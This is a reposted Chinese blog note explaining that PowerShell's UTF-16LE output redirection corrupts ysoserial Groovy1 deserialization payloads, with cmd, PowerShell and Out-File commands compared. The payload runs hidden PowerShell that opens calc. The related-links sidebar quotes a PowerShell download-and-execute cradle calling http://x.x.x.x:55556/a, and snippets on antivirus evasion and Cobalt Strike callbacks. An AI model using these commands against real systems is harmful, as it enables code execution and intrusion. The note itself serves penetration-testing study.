powershell 中文系统默认UTF-16 (LE) UNICODE编码 使用时需小心

最新推荐文章于 2025-05-26 11:59:59 发布
转载 最新推荐文章于 2025-05-26 11:59:59 发布 · 867 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
原文链接:http://www.cnblogs.com/Primzahl/p/10834207.html
标签
#java
本文探讨了使用PowerShell与Java两种不同方式生成payload的方法,并对比了cmd和powershell生成payload的差异。通过具体实例,展示了如何利用java-jarysoserial.jar工具结合Groovy1脚本,分别在cmd和powershell环境中生成payload文件。此外,文章还提供了进一步学习的资源链接。

现象:

1.cmd生成payload

java -jar ysoserial.jar Groovy1 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YwBhAGwAYwA=" > payload.bin

2.powershell生成payload

java -jar ysoserial.jar Groovy1 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YwBhAGwAYwA=" > payload2.bin

第二次生成:

java -jar ysoserial.jar Groovy1 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YwBhAGwAYwA=" | Out-File -Encoding default payload3.bin

3.结果对比

4.学习

https://wenku.baidu.com/view/768a052b915f804d2b16c149.html

https://docs.microsoft.com/zh-cn/powershell/module/Microsoft.PowerShell.Utility/Out-File?view=powershell-6

 

 

 

转载于:https://www.cnblogs.com/Primzahl/p/10834207.html

arthur2612
关注
Windows PowerShell 执行脚本输出文件编码格式
qr457535344的博客
03-30 3622
PowerShell 执行脚本输出文件编码格式修改
PowerShell输出字符串的编码UTF-16LE的问题
从零开始
12-01 2699
使用powershell遇到csv不分列的问题 修改powershell输出格式 修改执行策略
powershell cs-UTF-16LE编码上线
weixin_42109829的博客
07-05 874
当我们要上线主机的候,可能会因为你的代码含有木马字符串,导致无法上线1、 例子 powershell.exe -exec bypass -encodedCommand ZQBjAGgAbwAgACIAMQAyADMAIgA=2、原句子 3、UTF-16LE编码后 (在powershell上能直接执行) powershell.exe -w hidden -exec bypass -encodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAg
PowerShell使用 mysqldump 命令导出乱码
永远相信美好的事情即将发生
06-18 1112
有尝试使用 mysqldump 进行数据库导出,我的环境是 Windows ,因此使用默认的命令提示符来输入命令,导出如下图: mysqldump.exe --databases test1 -uroot -proot --default-character-set=utf8 > D:\Desktop\all-sql.sql 结果发现导出的数据原本应该为 UTF8 类型的中文字符最终是乱码,从往搜索 ...
设置Powershell输出流重定向到文件编码
最新发布
simple的博客
05-26 700
Powershell输出流重定向到文件编码在6.0版本发生了变化,老版本默认输出为UTF-16 LE编码,而新版本输出为UTF-8编码。在Windows中,系统自带的Powershell(版本为5.1)输出流重定向到文件编码固定为UTF-16 LE,与CMD的流重定向到文件编码为当前代码页(中文Windows系统为GB2312)不同。和在Powershell中运行下面的命令输出到文件的内容是不一样的。Windows Powershell的这个特点对于包含中文内容的输出极其不友好。
探究乱码问题的本源:GBK,UTF8,UTF16,UTF8BOM,ASN1之间的关联
qq_36472340的博客
07-24 4311
探究乱码问题的本源:GBK,UTF8,UTF16,UTF8BOM,ASN1之间的关联
Powershell免杀系列(二)
st3pby的博客
02-20 3799
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。 正文 powershell的免杀⽅法有很多,对代码进⾏编码是最常⻅的⼀种,这⾥介绍⼀个专⻔⽤来对powershell进⾏编码免杀的框架Invoke-Obfuscation,这也是著名的APT32组织海莲花常⽤的⼀个⼯具。 该工具可以对powershell代码进行 ASCII/hex/octal/binary/SecureS...
如何让PowerShell显示中文不乱码
随手记两笔
04-19 3万+
如今软件日益国际化的今天,Windows下的命令行却还顽固地使用本地编码来显示数据,这导致用UTF-8编码文件在命令行显示乱码。虽说Cygwin的内核cygwin1.dll有自动转换功能,可是因为GB2312中没有变音符号等特殊字符,某些字符仍然不能正常显示。 虽然控制面板可以改控制台编码,可是你会发现并没有UTF-8。其实Windows是支持UTF-8控制台的,只是把它藏起来了。 第一步,
Windows PowerShell 输出文件编码格式问题
qianxiao_1的博客
03-06 1万+
Windows PowerShell 输出重定向 (“>”) 文件编码默认UTF-16(LE)问题 问题描述:这两天在使用shp2pgsql发现Windows PowerShell(为使行文方便,以下使用WPS替代Windows PowerShell,下不赘述)对于文件的输出重定向默认选择”UTF-16 (LE)(微软称之为Unicode编码),而实际文件输出格式为”UTF-...
Powershell 中文转UNICODE
Q215046120的博客
10-21 1305
直接上CODE: $str = "我是谁" $ustr = "" for($i = 0; $i -lt $str.Length; $i++){ if([int]$str[$i] -gt 32 -and [int]$str[$i] -lt 127){ $ustr += $str[$i] } else{ $ustr += [System.St...
windows修改PowerShell(命令提示符)默认中文编码方式
热门推荐
云淡风轻
05-11 3万+
简介 目的:由于编程的候经常会用到不同的编码,但是由于和命令行默认编码不一致,就导致了输出的中文乱码,使用chcp命令可以修改当前命令行的编码方式 临修改 直接在powershell中执行 chcp命令 chcp 65001 永久修改 修改注册表的这个位置:[HKEY_CURRENT_USER\Console\CodePage] chcp命令使用的数字编码表 代...
_T() 函数
狼哥
11-14 2万+
_T("")是一个宏,他的作用是让你的程序支持Unicode编码因为Windows使用两种字符集ANSI和UNICODE,前者就是通常使用的单字节方式,但这种方式处理象中文这样的双字节字符不方便,容易出现半个汉字的情况。而后者是双字节方式,方便处理双字节字符。Windows NT的所有与字符有关的函数都提供两种方式的版本,而Windows 9x只支持ANSI方式。如果你编译一个程序为ANSI方式,
解决Windows终端PowerShell展示乱码的问题
h a 6 6 6 c k 为 你解决复杂难题!
05-23 5281
标题:解决Windows终端PowerShell展示乱码的问题在使用Windows终端中的PowerShell,有会遇到乱码显示的问题,这可能会给用户带来困扰。这种问题通常与字符编码设置有关,因为不同的字符编码会导致终端无法正确显示特定语言或特殊字符。在本文中,我们将介绍如何解决Windows终端PowerShell中乱码显示的问题,并详细说明各种字符编码的数字表示,以及相关命令的用法。
【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell
AA8j的博客
07-06 2895
0x01 项目地址 https://github.com/danielbohannon/Invoke-Obfuscation 0x02 用法 生成powershellpowershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:55556/a'))" 下载并用powershell进入项目目录执行:Import-Module .\Invoke-Obfuscati
linux shell下16进制 “\uxxxx” unicode to UTF-8中文
weixin_34006965的博客
09-27 3212
问题出现背景:   项目中有个通过ip获取归属地城市求,我是直接通过新浪的ip归属查询接口来获取的。我使用的是shell脚本调用   RESULT=$(curl -s 'http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js&ip=119.137.53.145')   返回json格式的值:  var remote_ip_...
渗透测试-window反弹shell
lza20001103的博客
05-11 5517
window反弹shell
PowerShell 另类提权,win10测试通过,已绕过UAC!
逆向思维
05-31 1万+
在乌云上看了一篇关于”非常规提权”的做法,试了一下,效果不错.装载过来,顺便加上自己的代码段. 简洁点写,省去大部分,要阅读原文的请去:http://drops.wooyun.org/tips/11989 0x00 简介通常,在Windows下面我们可以通过内核漏洞来提升权限,但是,我们常常会碰到所处服务器通过内核漏洞提权是行不通的,这个候,我们就要通过脆弱的Windows服务提权,
Powershell免杀
mingyqf的博客
05-11 2786
Powershell免杀 本文作者:Chenw 本文链接:https://www.cnblogs.com/chen-w/p/14726549.html 0x01 前言 前几天搞一个站的候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。 后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。 0x02 Powershell免杀思路 先介绍一下powershell木马最常用的方式
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值